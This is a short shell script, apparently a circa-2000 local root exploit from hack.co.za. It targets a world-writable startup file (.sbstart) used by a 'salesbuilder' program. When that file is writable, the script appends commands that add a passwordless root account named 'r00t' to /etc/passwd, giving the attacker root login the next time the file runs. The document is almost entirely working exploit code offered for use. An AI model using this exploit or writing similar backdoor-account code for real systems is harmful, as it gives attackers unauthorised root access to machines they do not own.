#!/bin/sh
#
# The startup file .sbstart linked from
# /usr/bin/salesbuilder   and
# /usr/local/bin/salesbuilder is set
# world writable so anyone can add code
# to it and possibly get root locally.
#
#                 by |scacco| <scacco@s0ftpj.org>
#
#                      ..2 second code by gov-boi

if [ -w /usr/local/bin/acushop/.sbstart ]; then 
  cat << _EOF_ >> /usr/local/bin/acushop/.sbstart
  echo "r00t::0:0::/root:/bin/sh" >> /etc/passwd
  echo "you may now login as r00t - gov-boi"
  _EOF_
fi; 
#                 www.hack.co.za           [2000]#